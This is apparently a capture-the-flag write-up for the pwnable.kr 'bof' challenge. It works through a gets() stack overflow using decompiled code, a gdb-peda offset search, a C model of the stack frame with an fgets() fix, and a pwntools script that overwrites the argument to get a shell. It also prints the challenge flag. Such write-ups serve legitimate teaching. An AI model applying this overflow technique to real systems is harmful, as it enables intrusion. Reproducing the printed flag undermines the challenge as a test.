pwnable.kr: bof
 
The third challenge on pwnable.kr.
0x00 Analysis of bof
Challenge files: https://github.com/Reshahar/BlogFile/tree/master/pwnable.kr-bof
Loading the binary in IDA, the function of interest is func; its decompilation is:
int __cdecl func(int a1)
{
    char s; // [sp+1Ch] [bp-2Ch]@1
    int v3; // [sp+3Ch] [bp-Ch]@1
    v3 = *MK_FP(__GS__, 20);
    puts("overflow me : ");
    gets(&s);
    if ( a1 == 0xCAFEBABE )
        system("/bin/sh");
    else
        puts("Nah..");
    return *MK_FP(__GS__, 20) ^ v3;
}
The logic is simple: if a1 == 0xCAFEBABE, func calls system("/bin/sh"); otherwise it prints "Nah..". a1 is func's argument, which on 32-bit x86 (cdecl) is passed on the stack just above the saved ebp and return address, and s is a local buffer below them that gets() fills with no length check. A long enough input therefore runs past s and overwrites a1. The stack canary (v3, the copy of gs:0x14 at [ebp-0xc]) also lies between s and a1 and gets clobbered on the way, but it is only verified at function return, after the comparison and the system() call, so the canary check does not stop the shell from spawning.
First find the offset from s to a1. Generate a cyclic pattern with peda:
gdb-peda$ pattern create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Disassemble func, locate the comparison, and try to set a breakpoint on it:
0x00000654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
.....
0x00000689 <+93>: ret
gdb-peda$ b *0x00000654
Breakpoint 1 at 0x654
gdb-peda$ r
Starting program: /root/D/stack overflow/pwnable.kr-bof/bof
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x654
The breakpoint cannot be inserted and the program simply runs to completion: the binary is position-independent, so the addresses gdb shows before the program is running (0x654) are unrelocated file offsets, not the runtime addresses. Break on func by symbol instead, which gdb resolves once the binary is loaded, and delete the stale breakpoint:
gdb-peda$ b func
Breakpoint 2 at 0x56555632
gdb-peda$ info b
Num Type Disp Enb Address What
1 breakpoint keep y 0x00000654
2 breakpoint keep y 0x56555632 <func+6>
gdb-peda$ delete 1
gdb-peda$ r
Starting program: /root/D/stack overflow/pwnable.kr-bof/bof
...
Breakpoint 2, 0x56555632 in func ()
gdb-peda$
gdb-peda$ disass func
Dump of assembler code for function func:
0x5655562c <+0>: push ebp
0x5655562d <+1>: mov ebp,esp
0x5655562f <+3>: sub esp,0x48
=> 0x56555632 <+6>: mov eax,gs:0x14
0x56555638 <+12>: mov DWORD PTR [ebp-0xc],eax
0x5655563b <+15>: xor eax,eax
0x5655563d <+17>: mov DWORD PTR [esp],0x5655578c
0x56555644 <+24>: call 0xf7e6fd00 <puts>
0x56555649 <+29>: lea eax,[ebp-0x2c]
0x5655564c <+32>: mov DWORD PTR [esp],eax
0x5655564f <+35>: call 0xf7e6f480 <gets>
0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
0x5655565b <+47>: jne 0x5655566b <func+63>
0x5655565d <+49>: mov DWORD PTR [esp],0x5655579b
0x56555664 <+56>: call 0xf7e49360 <system>
0x56555669 <+61>: jmp 0x56555677 <func+75>
0x5655566b <+63>: mov DWORD PTR [esp],0x565557a3
0x56555672 <+70>: call 0xf7e6fd00 <puts>
0x56555677 <+75>: mov eax,DWORD PTR [ebp-0xc]
0x5655567a <+78>: xor eax,DWORD PTR gs:0x14
0x56555681 <+85>: je 0x56555688 <func+92>
0x56555683 <+87>: call 0xf7f05270 <__stack_chk_fail>
0x56555688 <+92>: leave
0x56555689 <+93>: ret
End of assembler dump.
gdb-peda$ b* 0x56555654
Breakpoint 3 at 0x56555654
gdb-peda$ c
Continuing.
overflow me :
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
....
Breakpoint 3, 0x56555654 in func ()
gdb-peda$ x/wx $ebp+0x8
0xffffd400: 0x41474141
gdb-peda$ pattern offset 0x41474141
1095188801 found at offset: 52
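As an added cross-check (example code written for this page, not part of the original write-up or the challenge files), the C program below models func's frame from the offsets in the disassembly and builds the same payload the exploit sends. The struct layout, the canary stand-in value and the two simulated reads are assumptions for the model: it reproduces the 52-byte distance from s at [ebp-0x2c] to a1 at [ebp+0x8], shows the canary being clobbered by the same write, and contrasts gets() with a read bounded to the buffer size, which cannot reach a1.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of func()'s stack frame, reconstructed from the disassembly
 * (an assumed layout for illustration, not the compiler's own struct):
 *   [ebp-0x2c] s              gets() writes here with no bound
 *   [ebp-0x0c] canary         copy of gs:0x14, checked only at func+75
 *   [ebp+0x00] saved ebp
 *   [ebp+0x04] return address
 *   [ebp+0x08] a1             compared against 0xCAFEBABE at func+40
 * Assumes a little-endian host, like the x86 target. */
struct frame {
    char     s[0x20];      /* 0x2c - 0x0c = 0x20 bytes before the canary */
    uint32_t canary;
    uint8_t  pad[8];       /* [ebp-0x08] and [ebp-0x04] */
    uint32_t saved_ebp;
    uint32_t ret;
    uint32_t a1;
};

struct outcome {
    int a1_matches;        /* would the cmp at func+40 succeed? */
    int canary_intact;     /* would the check at func+78 pass? */
};

/* Distance from the buffer to the argument: one offset is below ebp,
 * the other above it, so they simply add. 0x2c + 0x8 = 52. */
static size_t arg_offset(unsigned buf_below_ebp, unsigned arg_above_ebp)
{
    return (size_t)buf_below_ebp + arg_above_ebp;
}

/* 'A' * offset followed by value in little-endian byte order, i.e. the
 * bytes pwntools' p32(0xCAFEBABE) appends. Returns the payload length,
 * or 0 if it does not fit in out. */
static size_t build_payload(uint8_t *out, size_t cap, size_t offset, uint32_t value)
{
    if (cap < offset + 4)
        return 0;
    memset(out, 'A', offset);
    for (int i = 0; i < 4; i++)
        out[offset + i] = (uint8_t)(value >> (8 * i));
    return offset + 4;
}

/* gets(): the copy is not bounded by the buffer, so it runs over the
 * canary, saved ebp and return address and reaches a1. */
static struct outcome simulate_gets(const uint8_t *payload, size_t len)
{
    struct frame f;
    const uint32_t canary = 0x11223344u;   /* constructed stand-in for gs:0x14 */
    memset(&f, 0, sizeof f);
    f.canary = canary;
    if (len > sizeof f)                    /* keep the model itself in bounds */
        len = sizeof f;
    memcpy(&f, payload, len);              /* starts at s, which is offset 0 */
    return (struct outcome){ f.a1 == 0xCAFEBABEu, f.canary == canary };
}

/* fgets(s, sizeof s, stdin): at most sizeof s - 1 bytes land in s, so
 * neither the canary nor a1 can be touched from the input. */
static struct outcome simulate_fgets(const uint8_t *payload, size_t len)
{
    struct frame f;
    const uint32_t canary = 0x11223344u;
    memset(&f, 0, sizeof f);
    f.canary = canary;
    if (len > sizeof f.s - 1)
        len = sizeof f.s - 1;
    memcpy(f.s, payload, len);
    f.s[len] = '\0';
    return (struct outcome){ f.a1 == 0xCAFEBABEu, f.canary == canary };
}

int main(void)
{
    uint8_t payload[64];
    size_t off = arg_offset(0x2c, 0x8);
    size_t n = build_payload(payload, sizeof payload, off, 0xCAFEBABEu);
    struct outcome g = simulate_gets(payload, n);
    struct outcome h = simulate_fgets(payload, n);
    printf("offset=%zu payload=%zu bytes offsetof(a1)=%zu\n",
           off, n, offsetof(struct frame, a1));
    printf("gets : a1 matches=%d canary intact=%d\n", g.a1_matches, g.canary_intact);
    printf("fgets: a1 matches=%d canary intact=%d\n", h.a1_matches, h.canary_intact);
    return 0;
}
```

The gets() model reports a1 matching while the canary is destroyed, which is exactly the order of events in the real binary: the comparison and system() run first, and the canary would only abort the process at the return that never comes. The fgets() model shows the minimal fix: bounding the read to the buffer keeps both a1 and the canary untouched.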
The offset is 52, which agrees with the frame layout in the disassembly: s starts at [ebp-0x2c] and a1 sits at [ebp+0x8], so 0x2c + 0x8 = 0x34 = 52 bytes separate them. The exploit in pwntools is then:
#filename:exp.py
#author:reshahar
from pwn import *
#p = process('./bof')
p = remote('pwnable.kr', 9000)
# 52 bytes of filler reach a1, then 0xCAFEBABE packed little-endian (bytes, for Python 3)
payload = b'A' * 52 + p32(0xCAFEBABE)
# gets() returns on a newline; sendline supplies it so the shell starts at once
p.sendline(payload)
p.interactive()
Running it gives a shell and the flag. The transcript below comes from a run that sent the payload with p.send and no trailing newline, so gets() was still reading when the first id was typed and swallowed it as the end of its input line; only the second id reached the shell (p.sendline avoids this):
root@kali:~/D/stack overflow/pwnable.kr-bof# python exp.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ id
$ id
uid=1008(bof) gid=1008(bof) groups=1008(bof)
$ ls
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)
$
0x01 Summary
Be careful when working through these: sometimes only a hair separates failure from success.